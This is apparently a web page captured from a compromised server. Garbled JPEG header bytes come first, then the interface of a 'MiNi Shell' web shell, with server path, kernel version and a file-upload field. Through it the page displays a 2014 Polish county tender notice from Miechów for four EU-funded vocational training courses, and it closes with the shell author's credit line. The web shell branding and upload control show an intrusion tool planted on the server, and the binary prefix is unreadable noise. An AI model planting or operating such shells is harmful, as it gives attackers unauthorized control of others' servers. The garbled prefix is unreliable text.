JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140103/2014-N-2014.html

<p class="kh_header"><b>Miechów: ORGANIZACJA I PRZEPROWADZENIE KURSÓW
W RAMACH PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO 
W MAŁOPOLSCE
współfinansowanego ze środków UE w ramach POKL



Zamówienie składa się z 4 części:
CZĘŚĆ I: Kurs profesjonalna recepcjonistka
CZĘŚĆ II: Kurs kierownika sklepu
CZĘŚĆ III: Kurs fakturzystki z obsługą komputera i kas fiskalnych
CZĘŚĆ IV: Kurs sekretarka-asystentka</b><br>
<b>Numer ogłoszenia: 2014 - 2014; data zamieszczenia: 03.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Miechowie , ul. Racławicka 12, 32-200 Miechów, woj. małopolskie, tel. 041 3821110, faks 041 3821118.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA I PRZEPROWADZENIE KURSÓW
W RAMACH PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO 
W MAŁOPOLSCE
współfinansowanego ze środków UE w ramach POKL



Zamówienie składa się z 4 części:
CZĘŚĆ I: Kurs profesjonalna recepcjonistka
CZĘŚĆ II: Kurs kierownika sklepu
CZĘŚĆ III: Kurs fakturzystki z obsługą komputera i kas fiskalnych
CZĘŚĆ IV: Kurs sekretarka-asystentka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ORGANIZACJA I PRZEPROWADZENIE KURSÓW
W RAMACH PROJEKTU MODERNIZACJA KSZTAŁCENIA ZAWODOWEGO 
W MAŁOPOLSCE
współfinansowanego ze środków UE w ramach POKL

Zamówienie składa się z 4 części:
CZĘŚĆ I: Kurs profesjonalna recepcjonistka
CZĘŚĆ II: Kurs kierownika sklepu
CZĘŚĆ III: Kurs fakturzystki z obsługą komputera i kas fiskalnych
CZĘŚĆ IV: Kurs sekretarka-asystentka

Szczegółowe przedstawienie przedmiotu zamówienia jest uwzględnione w Załączniki I -informacje dotyczące ofert częściowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób uprawionych do przeprowadzenia kursów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany wzór istotnych postanowień umowy, wpis do instytucji szkoleniowych lub akredytację Kuratorium Oświaty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Miechowie ul. Racławicka 12
32-200 Miechów
pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2014 godzina 11:00, miejsce: Starostwo Powiatowe w Miechowie ul. Racławicka 12
32-200 Miechów
sekretariat zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach współfinansowanego ze środków Unii Europejskiej należącego do Programu Operacyjnego kapitał ludzki, projekt Modernizacja Kształcenia Zawodowego w Małopolsce..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs profesjonalnej recepcjonistki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I: Kurs profesjonalna recepcjonistka
1. Liczba uczestników: 10 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 40 godz. teoretycznych i praktycznych łącznie.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności niezbędne do wykonywania zadań, między innymi  z zakresu: 
roli recepcji w nowoczesnej firmie: kontakty z klientami, przekaz informacji wewnątrz firmy;
tworzenia korzystnego wizerunku firmy wobec klienta;
dostosowania własnej osobowości do wymogów kultury firmy;
zasad właściwej organizacji pracy i technik pracy;
profesjonalnej komunikacji telefonicznej;
umiejętności radzenia sobie w sytuacjach trudnych;
uwarunkowań wynikających z obowiązujących przepisów prawnych.
4. Miejscem organizacji szkolenia może być Zespół Szkół Nr 1 w Miechowie, ul. Racławicka 23. Jeżeli, w ocenie oferenta, wyposażenie placówki nie będzie wystarczające, miejscem organizacji szkolenia może być inne, po uzgodnieniu ze szkolnym liderem projektu. W przypadku prowadzenia zajęć poza miastem Miechów instytucja szkoleniowa zobowiązuje się zapewnić nieodpłatnie dowóz uczestnikom szkolenia z Miechowa na miejsce odbywania się zajęć i z powrotem.
5. Zajęcia mogą odbywać się wyłącznie w godzinach pozalekcyjnych, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
6. Wykonawca zobowiązany jest do wykorzystania na kursie zakupionych ze środków projektu ekranów rozwijanych oraz wskaźników laserowych; Wykonawca zapewni pozostały sprzęt szkoleniowy na czas trwania kursu.
7. Wykonawca zapewnia nieodpłatnie materiał dydaktyczny dla każdego uczestnika kursu, który po skończonym kursie staje się własnością uczestników.
8. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu.
9. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
10. Wykonawca zobowiązany będzie po ukończeniu kursu przeprowadzić egzamin wewnętrzny sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
11. Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia szkolenia i listy obecności muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
12. Termin wykonania zamówienia: do 15.04.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kierownika sklepu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II: Kurs kierownika sklepu
1. Liczba uczestników: 10 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 40 godz. teoretycznych i praktycznych łącznie.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności niezbędne do wykonywania zadań kierownika sklepu. między innymi  z zakresu: 
zarządzania personelem, 
planowania i analizy sprzedaży, 
organizacji przestrzeni sprzedaży, 
gospodarki towarowej, 
dokumentacji i ewidencjonowania, 
oceny funkcjonowania sklepu, 
wybranych elementów kodeksu pracy, 
praw klienta.
4. Miejscem organizacji zajęć teoretycznych szkolenia może być Zespół Szkół Nr 1 w Miechowie, ul. Racławicka 23. Miejsce organizacji zajęć praktycznych zapewni Wykonawca. W przypadku ustalenia miejsca prowadzenia zajęć poza Miechowem, Wykonawca zapewnia transport uczestników kursu oraz ponosi wszelkie koszty z tym związane.
5. Zajęcia mogą odbywać się wyłącznie w godzinach pozalekcyjnych, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
6. Wykonawca zobowiązany jest do wykorzystania użyczonego sprzętu, zakupionego przez Zespół Szkół Nr 1 w Miechowie ze środków projektu (m.in. czytniki kodów kreskowych, metkownice, zestawy kasowe). W przypadku, gdy sprzęt ten nie będzie wystarczający do zrealizowania programu kursu, Wykonawca zapewni pozostały niezbędny sprzęt szkoleniowy. 
7. Wykonawca zapewnia nieodpłatnie materiał dydaktyczny dla każdego uczestnika kursu, który po skończonym kursie staje się własnością uczestników.
8. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu.
9. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
10. Wykonawca zobowiązany będzie po ukończeniu kursu przeprowadzić egzamin wewnętrzny sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
11. Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia szkolenia i listy obecności muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
12. Termin wykonania zamówienia: do 15.04.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III: Kurs fakturzystki z obsługą komputera i kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III: Kurs fakturzystki z obsługą komputera i kas fiskalnych

1. Liczba uczestników: 30 uczniów; w podziale na 2 grupy.
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć, dla każdej grupy: minimum 60 godz. teoretycznych i praktycznych łącznie.
3. Kursant powinien pozyskać wiedzę i  praktyczne umiejętności z zakresu programowania i  prowadzenia sprzedaży przy użyciu kasy fiskalnej i urządzeń komputerowych z uwzględnieniem popularnych programów komputerowych (inny niż Insert), wykorzystywanych w handlu oraz rozliczania utargów w placówkach handlowych, a w szczególności zapoznać się z:
przepisami prawnymi  związanymi z zawodem sprzedawcy,
elementami towaroznawstwa handlowego,
dokumentacją magazynową i handlową,
programem magazynowo-księgowym,
programowaniem i obsługą wyposażenia boksu kasowego.
4. Miejscem organizacji szkolenia będzie: Zespół Szkół Nr 1 w Miechowie, ul. Racławicka 23.
5. Wykonawca zobowiązany jest do zapewnienia materiału dydaktycznego - teoretycznego i praktycznego, który po przeprowadzonym kursie staje się własnością uczestników.
6. Wykonawca zobowiązany jest do wykorzystania użyczonego sprzętu, zakupionego przez Zespół Szkół Nr 1 w Miechowie ze środków projektu (komputery, zestawy kasowe). W przypadku, gdy sprzęt ten nie będzie wystarczający do zrealizowania programu kursu, Wykonawca zapewni pozostały niezbędny sprzęt szkoleniowy.
7. Wykonawca jest zobowiązany do uzgodnienia z liderem szkolnym wstępnych terminów przeprowadzenia kursu dla poszczególnych grup, przed podpisaniem umowy.
8. Zajęcia mogą odbywać się wyłącznie w godzinach pozalekcyjnych, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
9. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu.
10. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
11. Wykonawca zobowiązany będzie po ukończeniu kursu przeprowadzić egzamin wewnętrzny sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu (zaświadczenie, świadectwo, certyfikat itp.) zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
12. Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia szkolenia i listy obecności muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
13. Termin wykonania zamówienia: do 20.06.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs sekretarka-asystentka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV: Kurs sekretarka-asystentka

1. Liczba uczestników: 15 uczniów. 
Zamawiający zastrzega sobie prawo zmiany ilości uczestników kursu w przypadkach losowych lub rezygnacji uczestnika w trakcie kursu.
2. Ilość godzin zajęć: minimum 60 godz. teoretycznych i praktycznych łącznie.
3. Program kursu powinien zapewnić przygotowanie do prowadzenia sekretariatu poprzez pozyskanie wiedzy i umiejętności z zakresu:
organizacji i działania biura, 
tworzenia i przechowywania dokumentów, 
wykorzystania w pracy zarówno tradycyjnych, jak i nowoczesnych technik biurowych,
pomocy w rekrutacji nowych pracowników,
prowadzenia spraw kadrowych w imieniu pracodawcy, 
komunikowania się z otoczeniem, 
tworzenia własnego wizerunku jako przedstawiciela firmy, 
profesjonalnego zarządzania biurem.
4. Miejscem organizacji szkolenia może być Zespół Szkół Nr 1 w Miechowie, ul. Racławicka 23. Jeżeli, w ocenie oferenta, wyposażenie placówki nie będzie wystarczające, miejscem organizacji szkolenia może być inne, po uzgodnieniu ze szkolnym liderem projektu. W przypadku przeprowadzenia zajęć poza miastem Miechów instytucja szkoleniowa zobowiązuje się zapewnić nieodpłatnie dowóz uczestnikom szkolenia z Miechowa na miejsce odbywania się zajęć i z powrotem.
5. Wykonawca zobowiązany jest do wykorzystania na kursie zakupionych ze środków projektu ekranów rozwijanych oraz wskaźników laserowych; Wykonawca zapewni pozostały sprzęt szkoleniowy na czas trwania kursu.
6. Wykonawca zapewnia nieodpłatnie materiał dydaktyczny dla każdego uczestnika kursu, który po skończonym kursie staje się własnością uczestników.
7. Zajęcia mogą odbywać się wyłącznie w godzinach pozalekcyjnych, zgodnie z harmonogramem uzgodnionym i zaakceptowanym przez szkolnego lidera projektu.
8. Wykonawca zobowiązany jest do przedstawienia, do zaakceptowania, na minimum 3 dni przed rozpoczęciem kursu, programu i wstępnego harmonogramu kursu.
9. Wykonawca zobowiązany jest do rzetelnego i systematycznego prowadzenia wszelkiej dokumentacji kursu; podczas trwania kursu dokumentacja będzie przechowywana w miejscu wskazanym przez szkolnego lidera projektu, a po zakończeniu kursu niezwłocznie przekazana szkolnemu liderowi projektu.
10. Wykonawca zobowiązany będzie po ukończeniu kursu przeprowadzić egzamin wewnętrzny sprawdzający umiejętności i na tej podstawie wydać stosowne dokumenty świadczące o ukończeniu kursu zaświadczenie, świadectwo, certyfikat itp. zgodnie z Rozporządzeniem Ministra Edukacji Narodowej.
11. Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia szkolenia i listy obecności muszą być oznaczone logotypami projektu zgodnie ze wskazaniem Zamawiającego. 
12. Termin wykonania zamówienia: do 15.04.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com